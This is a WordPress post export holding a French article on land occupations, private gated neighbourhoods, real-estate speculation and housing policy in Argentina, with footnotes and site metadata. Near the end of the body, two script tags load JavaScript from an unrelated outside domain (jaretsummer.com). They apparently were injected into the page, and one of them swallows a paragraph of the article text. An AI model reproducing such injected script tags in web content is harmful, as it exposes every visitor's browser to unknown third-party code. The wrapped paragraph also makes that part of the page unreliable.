Fossati lors de la pr\u00e9sentation de la nouvelle m\u00e9thodologie d\u2019\u00e9valuation des pays en juin 2018. Gast\u00f3n Fossati \u00e9tait \u00e0 la t\u00eate de l\u2019Agence des revenus de la province de Buenos Aires (ARBA) sous le gouvernement de Mar\u00eda Eugenia Vidal [gouverneure de la province de Buenos Aires de d\u00e9cembre 2015 \u00e0 d\u00e9cembre 2019]. Dans sa pr\u00e9sentation, il a illustr\u00e9 la situation suivante\u00a0: \u00ab\u00a0Sur le territoire de Buenos Aires, il y a environ 1000 quartiers et d\u00e9veloppements similaires. Moins de la moiti\u00e9 d\u2019entre eux sont r\u00e9gularis\u00e9s et paient des imp\u00f4ts en cons\u00e9quence, tandis que 590 autres paient des imp\u00f4ts en tant que parcelles rurales ou terrains vagues, bien que la plupart d\u2019entre eux aient termin\u00e9 toutes leurs infrastructures.\u00a0\u00bb Les habitants de Buenos Aires ne vont pas faire leurs ces territoires dangereux, entour\u00e9s de vigiles.<\/span><\/p>\n<figure style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.cadtm.org\/local\/cache-vignettes\/L640xH457\/venicetigre-cd3fa.jpg?1600422621\" alt=\"\" width=\"640\" height=\"457\" \/><figcaption class=\"wp-caption-text\">Parc nautique de Buenos Aires- Parque n\u00e1utico Buenos Aires<\/figcaption><\/figure>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Le CELS est intervenu dans le cas de Venice [quartier privil\u00e9gi\u00e9 pas loin du centre urbain de Tigre et qui voisine le Rio Luj\u00e1n], un quartier nautique priv\u00e9 qui jouxte une agglom\u00e9ration populaire appel\u00e9e El Garrote o\u00f9 vivent 850 familles qui craignaient que les travaux n\u2019augmentent le risque d\u2019inondation\u00a0: \u00ab\u00a0Au cours de la proc\u00e9dure judiciaire, il est apparu clairement que la proc\u00e9dure construction de Venice avait \u00e9t\u00e9 approuv\u00e9e avec de graves d\u00e9fauts et omissions. L\u2019une des plus notoires a \u00e9t\u00e9 l\u2019approbation irr\u00e9guli\u00e8re par la municipalit\u00e9 du projet qui \u00e9tait situ\u00e9 dans une zone class\u00e9e comme industrielle, c\u2019est-\u00e0-dire non compatible avec ce type de logements.\u00a0\u00bb Les travaux ont commenc\u00e9 sans \u00e9tude d\u2019impact environnemental ou hydraulique. Une pratique similaire a \u00e9t\u00e9 constat\u00e9e dans le d\u00e9veloppement du Colony Park [habitations de facto sur une \u00eele priv\u00e9e] sur les \u00eeles du delta du Tigre, avec le facteur aggravant que la compagnie a exerc\u00e9 des pressions et utilis\u00e9 des m\u00e9thodes violentes, en faisant m\u00eame appel \u00e0 la pr\u00e9fecture navale argentine, qui est intervenue dans l\u2019expulsion des familles vivant dans cette zone. Selon le CELS, \u00ab\u00a0les m\u00e9canismes d\u2019\u00e9valuation des terres dans les contextes urbains et ruraux r\u00e9pondent \u00e0 des processus diff\u00e9rents, mais il est possible de trouver des similitudes dans la mani\u00e8re dont l\u2019opacit\u00e9 et l\u2019inertie de la bureaucratie \u00e9tatique permettent \u00e0 certains groupes d\u2019entreprises de g\u00e9n\u00e9rer des profits extraordinaires.\u00a0\u00bb Et pas seulement cela. L\u2019\u00c9tat donne souvent libre cours \u00e0 des urbanisations ferm\u00e9es (enclos) qui d\u00e9gradent l\u2019environnement et accentuent la s\u00e9gr\u00e9gation socio-spatiale. L\u2019expulsion des producteurs paysans et des peuples autochtones pour le d\u00e9veloppement de l\u2019agrobusiness ou simplement pour le repos placide du multimillionnaire Joe Lewis ou de la famille Benetton est un \u00ab\u00a0droit universel\u00a0\u00bb des propri\u00e9taires de tout<span class=\"spip_note_ref\">\u00a0[<a id=\"nh7\" class=\"spip_note\" title=\"Centro de Estudios Legales y Sociales (CELS), \u201cReglas a medida. Empresas y\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb7\" rel=\"appendix\">7<\/a>]<\/span>.<\/span><\/div>\n<div><\/div>\n<div>\n<figure style=\"width: 560px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.cadtm.org\/local\/cache-vignettes\/L560xH367\/tourpuertomadero-df60b.jpg?1600422621\" alt=\"\" width=\"560\" height=\"367\" \/><figcaption class=\"wp-caption-text\">Les tours de Puerto Madero, \u00e0 Buenos Aires, sur le Rio de la Plata\/\/ Las Torres de Puerto Madero, en Buenos Aires, sobre el R\u00edo de la Plata<\/figcaption><\/figure>\n<\/div>\n<div>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Un rapport du CIPPEC [organisme li\u00e9 au minist\u00e8re du D\u00e9veloppement social de la nation] indique qu\u2019entre 2006 et 2016, dans les principaux agglom\u00e9rats de la r\u00e9gion centrale du pays (Buenos Aires, Cordoba, Entre Rios, La Pampa, Santa Fe), les villes ont accru leurs surfaces de 45 828 hectares\u00a0: 38\u00a0% de l\u2019expansion s\u2019explique par des urbanisations ferm\u00e9es (habitats de luxe, quartiers priv\u00e9s), 23\u00a0% par une utilisation r\u00e9sidentielle urbaine habituelle, 10\u00a0% par une utilisation r\u00e9sidentielle extra-urbaine, 10\u00a0% par des taudis ou des bidonvilles. Le logement social repr\u00e9sente \u00e0 peine 3\u00a0% du total<span class=\"spip_note_ref\">\u00a0[<a id=\"nh8\" class=\"spip_note\" title=\"CIPPEC, \u00bfC\u00f3mo crecen las ciudades argentinas ? Estudio de la expansi\u00f3n urbana\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb8\" rel=\"appendix\">8<\/a>]<\/span>. Pablo Vitale ne doute pas que c\u2019est le march\u00e9 qui impose l\u2019habitat informel car \u00ab\u00a0il est distribu\u00e9 en fonction de la capacit\u00e9 de revenu de la population\u00a0\u00bb. Il se demande ce qui se passerait si la m\u00eame chose arrivait dans le domaine de la sant\u00e9 ou de l\u2019\u00e9ducation. Faudrait-il soumettre \u00e0 la mort suite \u00e0 la maladie ceux qui ne peuvent pas disposer d\u2019une aide sociale ou de soins assur\u00e9s ou soumettre \u00e0 l\u2019analphab\u00e9tisme ceux qui ne peuvent pas payer une \u00e9cole priv\u00e9e\u00a0? \u00ab\u00a0Cela nous semblerait tr\u00e8s pervers\u00a0\u00bb, dit-il. Parall\u00e8lement \u00e0 l\u2019avanc\u00e9e du capital immobilier, on compte plus de deux millions de maisons vides dans les quartiers luxueux, dans les super tours de Puerto Madero [quartier luxueux donnant sur le Rio de la Plata] et dans autant d\u2019\u00e9tablissements de luxe \u00e0 travers le pays.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Le ph\u00e9nom\u00e8ne est mondial. Le g\u00e9ographe marxiste David Harvey souligne que \u00ab\u00a0l\u2019\u00e9nigme\u00a0\u00bb du capital est de savoir o\u00f9 placer avec profit des masses de capitaux, de dollars accumul\u00e9s sans savoir o\u00f9 les investir. Une \u00ab\u00a0solution cl\u00e9 au probl\u00e8me de l\u2019absorption du capital exc\u00e9dentaire\u00a0\u00bb est la construction de nouvelles zones g\u00e9ographiques<span class=\"spip_note_ref\">\u00a0[<a id=\"nh9\" class=\"spip_note\" title=\"David Harvey (2012), El enigma del capital y las crisis del capitalismo,\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb9\" rel=\"appendix\">9<\/a>]<\/span>. Harvey souligne qu\u2019il y a beaucoup de <em><a class=\"cs_glossaire\" href=\"http:\/\/www.cadtm.org\/Speculation\" name=\"mot841_1\"><span class=\"gl_mot\">sp\u00e9culation<\/span><\/a><\/em> dans le commerce des terres et des maisons. Ainsi, on assiste \u00e0 une construction incontr\u00f4l\u00e9e des villes, une folie de l\u2019urbanisation, qui s\u2019exprime dans des endroits comme Duba\u00ef avec des gratte-ciel o\u00f9 l\u2019on peut skier au milieu du d\u00e9sert, dans l\u2019urbanisation spectaculaire de la Chine avec des villes fant\u00f4mes [car en partie sans habitants] ou dans le boom immobilier de New York avec des gratte-ciel et des condominiums pour les personnes ultra-riches qui font monter les prix en expulsant le reste de la population du centre des villes, dans ce que l\u2019on appelle la gentrification<span class=\"spip_note_ref\">\u00a0[<a id=\"nh10\" class=\"spip_note\" title=\"En esta entrevista con la Universidad de Nacional Aut\u00f3noma de M\u00e9xico (UNAM)\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb10\" rel=\"appendix\">10<\/a>]<\/span>. L\u2019\u00c9tat, par le biais de la <a class=\"cs_glossaire\" href=\"http:\/\/www.cadtm.org\/Dette-970\" name=\"mot970_2\"><span class=\"gl_mot\">dette<\/span><\/a> publique, offre \u00e9galement un d\u00e9bouch\u00e9 rentable au capital financier\u00a0: il canalise ainsi les ressources vers la construction d\u2019infrastructures de base pour l\u2019urbanisation que le capital consid\u00e8re comme non rentables. Dans l\u2019ensemble, c\u2019est un ph\u00e9nom\u00e8ne qui r\u00e9pond aux besoins de placement de capitaux. Ce qui est construit n\u2019est d\u2019aucune utilit\u00e9 pour les personnes qui continuent \u00e0 vivre dans la pauvret\u00e9. Une r\u00e9alit\u00e9 qui est frapp\u00e9e du coin de l\u2019irrationalit\u00e9 urbaine qui engendre la rationalit\u00e9 de la recherche incessante du profit par le capital, notamment financier et immobilier. La d\u00e9finition de l\u2019urbanisation comme \u00ab\u00a0valeur d\u2019usage complexe\u00a0\u00bb, selon les termes de Christian Topalov, semble \u00eatre invers\u00e9e\u00a0: la \u00ab\u00a0valeur d\u2019\u00e9change\u00a0\u00bb, la r\u00e9alisation du profit, semble s\u2019\u00e9manciper de la \u00ab\u00a0valeur d\u2019usage\u00a0\u00bb, de l\u2019utilit\u00e9 de ce qui est produit dans un monde de personnes sans maisons et de maisons sans personnes. Mais tout n\u2019est pas si simple. Harvey affirme que le capital, tout comme il parvient avec ce type de \u00ab\u00a0solutions spatio-temporelles\u00a0\u00bb \u00e0 d\u00e9placer les crises dans le temps et l\u2019espace, g\u00e9n\u00e8re les conditions de la crise suivante, mais \u00e0 une \u00e9chelle plus \u00e9lev\u00e9e.<\/span><\/p>\n<h3 id=\"repondre_aux_besoins_sociaux\" class=\"spip\" style=\"text-align: center;\"><a class=\"sommaire_ancre\" title=\"Sommaire\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#outil_sommaire\">\u00a0<\/a>R\u00e9pondre aux besoins sociaux<\/h3>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Pablo Vitale a indiqu\u00e9 une s\u00e9rie d\u2019alternatives pour r\u00e9soudre le probl\u00e8me du logement des secteurs populaires autres que la r\u00e9pression, l\u2019expulsion ou la valorisation effr\u00e9n\u00e9e du capital\u00a0: la r\u00e9gularisation de la propri\u00e9t\u00e9, la fourniture de services et d\u2019infrastructures pour ceux qui sont d\u00e9j\u00e0 dans des taudis et des bidonvilles\u00a0; la fourniture directe de logements pour les autres qui souffrent du manque de logements\u00a0; la r\u00e9glementation de l\u2019utilisation des terrains pour limiter le march\u00e9 \u00e0 des fins sp\u00e9culatives. Il insiste sur le fait que l\u2019investissement public ne doit pas faire l\u2019objet d\u2019une appropriation priv\u00e9e, mais doit avoir une fonction sociale. Il pense \u00e9galement que des alternatives \u00e0 la propri\u00e9t\u00e9 priv\u00e9e individuelle peuvent \u00eatre g\u00e9n\u00e9r\u00e9es comme moyen d\u2019acc\u00e8s au logement\u00a0: utilisation de terrains et de logements \u00e0 des fins d\u2019habitation qui ne sont pas soumises au march\u00e9\u00a0; coop\u00e9ratives de logement\u00a0; ou location sociale. Cette derni\u00e8re approche est int\u00e9ressante dans la mesure o\u00f9 elle ouvre une perspective de r\u00e9forme urbaine int\u00e9grale et un plan de travaux publics avec l\u2019horizon fix\u00e9 sur un autre type d\u2019organisation sociale.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Combien co\u00fbterait l\u2019int\u00e9gration urbaine des pr\u00e8s de 4500 bidonvilles et terrains occup\u00e9s recens\u00e9s dans le pays\u00a0? Selon le CIPPEC, cela co\u00fbterait 26 milliards de dollars. La moiti\u00e9 du plus gros pr\u00eat de l\u2019histoire du <a class=\"cs_glossaire\" href=\"http:\/\/www.cadtm.org\/FMI,786\" name=\"mot786_3\"><span class=\"gl_mot\">FMI<\/span><\/a> [les 40 milliards accord\u00e9s \u00e0 Macri par l\u2019actuelle dirigeante de la BEC, Christine Lagarde] suffirait pour am\u00e9liorer les conditions d\u2019habitat de plus de 4 millions de personnes. La plupart de ces dollars se sont envol\u00e9s\u00a0: ils sont entr\u00e9s par une fen\u00eatre et sont sortis par une autre pour aller sur les comptes des riches dans les <a class=\"cs_glossaire\" href=\"http:\/\/www.cadtm.org\/Paradis-fiscal-Paradis-fiscaux\" name=\"mot832_4\"><span class=\"gl_mot\">paradis fiscaux<\/span><\/a>. Avec les n\u00e9gociations de Martin Guzman [ministre de l\u2019Economie du gouvernement d\u2019Alberto Fernandez], l\u2019hypoth\u00e8que de la dette [la restructuration n\u00e9goci\u00e9e porte sur 66,13 milliards de dollars, ce qui permet d\u2019\u00e9viter \u00ab\u00a0le d\u00e9faut de paiement\u00a0\u00bb] est toutefois laiss\u00e9e aux travailleurs. Dans un article en r\u00e9ponse au journal <i>La Naci\u00f3n<\/i> pour d\u00e9fendre son administration, la ministre du D\u00e9veloppement territorial et de l\u2019Habitat, Mar\u00eda Eugenia Bielsa, a expliqu\u00e9 que l\u2019organisation dispose d\u2019un budget de 37 milliards de pesos [49 millions de dollars] pour l\u2019ann\u00e9e en cours. C\u2019est neuf fois moins que les paiements de la dette effectu\u00e9s entre janvier et juillet de cette ann\u00e9e, selon les chiffres pr\u00e9sent\u00e9s par le chef de cabinet Santiago Cafiero dans son rapport au Congr\u00e8s. Il n\u2019y aura pas de ressources pour r\u00e9soudre la crise du logement de mani\u00e8re globale sans rupture avec le FMI, avec les loups de Wall Street, sans nationalisation de la banque pour qu\u2019elle soit au service des travailleurs, cela parmi les mesures qui donnent la priorit\u00e9 aux besoins sociaux. Le gouvernement, qui a refus\u00e9 de d\u00e9clarer ill\u00e9gitime et ill\u00e9gale l\u2019escroquerie \u00e0 la dette macro\u00e9conomique, s\u2019est engag\u00e9 dans la campagne pour l\u2019\u00ab\u00a0ill\u00e9galit\u00e9\u00a0\u00bb des occupations de terres. Un traitement diff\u00e9rent pour chaque classe sociale.<\/span><\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">Notes:<\/span><\/strong><\/p>\n<div id=\"nb1\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 1\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh1\" rev=\"appendix\">1<\/a>]\u00a0<\/span>Lucas Jord\u00e1n Dombroski, \u201cLos territorios de asentamientos en el borde metropolitano de Buenos Aires, desde 1980 a la actualidad\u201d, <i>Revista Urbano<\/i> N\u00ba 41 \/ mayo 2020-octubre 2020, pp. 84-101.<\/span><\/p>\n<\/div>\n<div id=\"nb2\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 2\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh2\" rev=\"appendix\">2<\/a>]\u00a0<\/span>Topalov, Christian (1978), <i>La urbanizaci\u00f3n capitalista\u00a0: algunos elementos para su an\u00e1lisis<\/i>, Buenos Aires, Mimeo, UBA. Versi\u00f3n digital\u00a0: <a class=\"spip_url spip_out auto\" href=\"https:\/\/leerlaciudadblog.files.wordpress.com\/2016\/05\/topalov-la-urbanizacic3b3n-capitalista.-algunos-elementos-para-su-anc3a1lisis.pdf\" rel=\"nofollow external\">https:\/\/leerlaciudadblog.files.wordpress.com\/2016\/05\/topalov-la-urbanizacic3b3n-capitalista.-algunos-elementos-para-su-anc3a1lisis.pdf<\/a><\/span><\/p>\n<\/div>\n<div id=\"nb3\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 3\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh3\" rev=\"appendix\">3<\/a>]\u00a0<\/span>Dans d\u2019autres textes, Topalov analyse en profondeur les revenus qu\u2019il synth\u00e9tise en trois types\u00a0: absolu, relatif et monopolistique. Une version synth\u00e9tique peut \u00eatre trouv\u00e9e dans\u00a0: Topalov, Christian. \u201cSobreganancias y rentas del suelo en la ciudad capitalista\u201d, en Mart\u00ednez Pardo Maite. <i>Estudios sobre la renta del suelo<\/i>. Comunidad de Madrid, Consejer\u00eda de Ordenaci\u00f3n del Territorio, Medio Ambiente y Vivienda\u00a0: 1985, pp. 255-290.<\/span><\/p>\n<\/div>\n<div id=\"nb4\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 4\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh4\" rev=\"appendix\">4<\/a>]\u00a0<\/span>Centro de Estudios Legales y Sociales (CELS), \u201cReglas a medida. Empresas y acceso al h\u00e1bitat\u201d. Disponible\u00a0: <a class=\"spip_url spip_out auto\" href=\"https:\/\/www.cels.org.ar\/informe2019\/reglasamedida.html\" rel=\"nofollow external\">https:\/\/www.cels.org.ar\/informe2019\/reglasamedida.html<\/a><\/span><\/p>\n<\/div>\n<div id=\"nb5\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 5\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh5\" rev=\"appendix\">5<\/a>]\u00a0<\/span>Esta informaci\u00f3n est\u00e1 en el cap\u00edtulo dedicado a Constantini en el libro <i>Los due\u00f1os del futuro<\/i> de Hern\u00e1n Vanoli y Alejandro Galliano, publicado por Planeta.<\/span><\/p>\n<\/div>\n<div id=\"nb6\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 6\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh6\" rev=\"appendix\">6<\/a>]\u00a0<\/span>Cecilia Rodr\u00edguez, \u201cNegocios que huelen mal\u00a0: Massa entreg\u00f3 tierras p\u00fablicas a Nordelta S.A.\u201d. Disponible sur\u00a0: <a class=\"spip_url spip_out auto\" href=\"http:\/\/www.laizquierdadiario.com\/Negocios-que-huelen-mal-Massa-entrego-tierras-publicas-a-Nordelta-S-A\" rel=\"nofollow external\">http:\/\/www.laizquierdadiario.com\/Negocios-que-huelen-mal-Massa-entrego-tierras-publicas-a-Nordelta-S-A<\/a>.<\/span><\/p>\n<\/div>\n<div id=\"nb7\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 7\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh7\" rev=\"appendix\">7<\/a>]\u00a0<\/span>Centro de Estudios Legales y Sociales (CELS), \u201cReglas a medida. Empresas y acceso al h\u00e1bitat\u201d. Disponible\u00a0: <a class=\"spip_url spip_out auto\" href=\"https:\/\/www.cels.org.ar\/informe2019\/reglasamedida.html\" rel=\"nofollow external\">https:\/\/www.cels.org.ar\/informe2019\/reglasamedida.html<\/a><\/span><\/p>\n<\/div>\n<div id=\"nb8\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 8\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh8\" rev=\"appendix\">8<\/a>]\u00a0<\/span>CIPPEC, \u00bfC\u00f3mo crecen las ciudades argentinas\u00a0? Estudio de la expansi\u00f3n urbana de los 33 grandes aglomerados. Disponible en\u00a0: <a class=\"spip_url spip_out auto\" href=\"https:\/\/www.cippec.org\/wp-content\/uploads\/2018\/11\/C%C3%B3mo-crecen-las-ciudades-argentinas-CIPPEC.pdf\" rel=\"nofollow external\">https:\/\/www.cippec.org\/wp-content\/uploads\/2018\/11\/C%C3%B3mo-crecen-las-ciudades-argentinas-CIPPEC.pdf<\/a><\/span><\/p>\n<\/div>\n<div id=\"nb9\" style=\"text-align: justify;\">\n<p><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 9\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh9\" rev=\"appendix\">9<\/a>]\u00a0<\/span>David Harvey (2012), <i>El enigma del capital y las crisis del capitalismo<\/i>, Akal, p\u00e1g. 153.<\/span><\/p>\n<\/div>\n<div id=\"nb10\">\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><span class=\"spip_note_ref\">[<a class=\"spip_note\" title=\"Notes 10\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nh10\" rev=\"appendix\">10<\/a>]\u00a0<\/span>En esta entrevista con la Universidad de Nacional Aut\u00f3noma de M\u00e9xico (UNAM) sintetiza bien estas ideas\u00a0: <a class=\"spip_url spip_out auto\" href=\"https:\/\/www.youtube.com\/watch?reload=9&amp;v=4ivDLU5X52U\" rel=\"nofollow external\">https:\/\/www.youtube.com\/watch?reload=9&amp;v=4ivDLU5X52U<\/a><\/span><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Pablo Anino<\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Original: <a href=\"http:\/\/www.lapluma.net\/2020\/09\/22\/argentina-toma-de-tierras-la-lucha-de-clases-urbana\/\">Argentina- Toma de tierras: la lucha de clases urbana<\/a><\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Edit\u00e9 par <a href=\"http:\/\/www.lapluma.net\/fr\/nosotros\/editora\/\">Mar\u00eda Piedad Ossaba<\/a><\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Source: <a href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de\">CADTM<\/a>, le 18 septembre 2020<\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Publie par <a class=\"spip_out\" href=\"http:\/\/alencontre.org\/ameriques\/amelat\/argentine\/argentine-laccaparement-des-terres-et-lurbanisation-capitaliste-la-lutte-de-classes-en-milieu-urbain.html\" rel=\"external\">A l\u2019encontre<\/a><\/span><\/strong><\/p>\n<\/div>\n<\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\">L\u2019une des occupations de terre les plus embl\u00e9matiques de ces derniers mois est celle de Guernica [dans la p\u00e9riph\u00e9rie du Grand Buenos Aires] : elle couvre 100 hectares, divis\u00e9s en 4 quartiers. Il y a 2500 familles et 3000 enfants. Les porte-parole de ces habitants disent aux journalistes qu\u2019ils ne se trouvent pas dans des terres occup\u00e9es mais dans un quartier. Les faits les confirment : ils ont avanc\u00e9 dans la partition des hectares, creus\u00e9 des foss\u00e9s et install\u00e9 des poteaux d\u2019\u00e9clairage. Il y a des espaces pr\u00e9vus pour une \u00e9cole, un jardin d\u2019enfants et une place. L\u2019urbanisation des pauvres, qui manquent de toutes sortes de ressources, montre la capacit\u00e9 cr\u00e9ative de ces habitants-travailleurs. Les occupants d\u2019une terre qui \u00e9tait en d\u00e9su\u00e9tude il y a des ann\u00e9es d\u00e9noncent que les forces de police les emp\u00eachent de faire entrer dans les mat\u00e9riaux pour construire leurs maisons. Ils vivent en prison dans leur ville, sous la menace d\u2019une expulsion.<span id=\"mce_marker\" data-mce-type=\"bookmark\" data-mce-fragment=\"1\">\u200b<\/span><\/script><\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> Le gouvernement, qui a refus\u00e9 de d\u00e9clarer ill\u00e9gitime et ill\u00e9gale l\u2019escroquerie \u00e0 la dette macro\u00e9conomique, s\u2019est engag\u00e9 dans la campagne pour l\u2019\u00ab ill\u00e9galit\u00e9 \u00bb des occupations de terres. Un traitement diff\u00e9rent pour chaque classe sociale.<\/p>\n","protected":false},"author":706,"featured_media":21144,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[217],"tags":[10452,10755,10751,10757,10748,10756,10745,10758,10754,10750,10753,10746,10749,10747,10752],"coauthors":[10744],"class_list":["post-21140","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-abya-yala","tag-argentina-abya-yala","tag-argentine-abya-yala","tag-asociacion-civil-por-la-igualdad-y-la-justicia-acij","tag-baissez-vos-armes","tag-bajen-las-armas","tag-lurbanisation-des-pauvres","tag-lucha-de-clases-urbana","tag-lutte-de-classes-en-milieu-urbain","tag-pablo-anino","tag-pablo-vitale","tag-precariedad-e-informalidad","tag-toma-de-tierras-guernica","tag-urbanizacion-capitalista","tag-urbanizacion-de-los-pobres","tag-villas-asentamientos-informales"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":true,"content":true,"excerpt":true}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/706"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=21140"}],"version-history":[{"count":4,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21140\/revisions"}],"predecessor-version":[{"id":21146,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/21140\/revisions\/21146"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/21144"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=21140"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=21140"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=21140"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=21140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}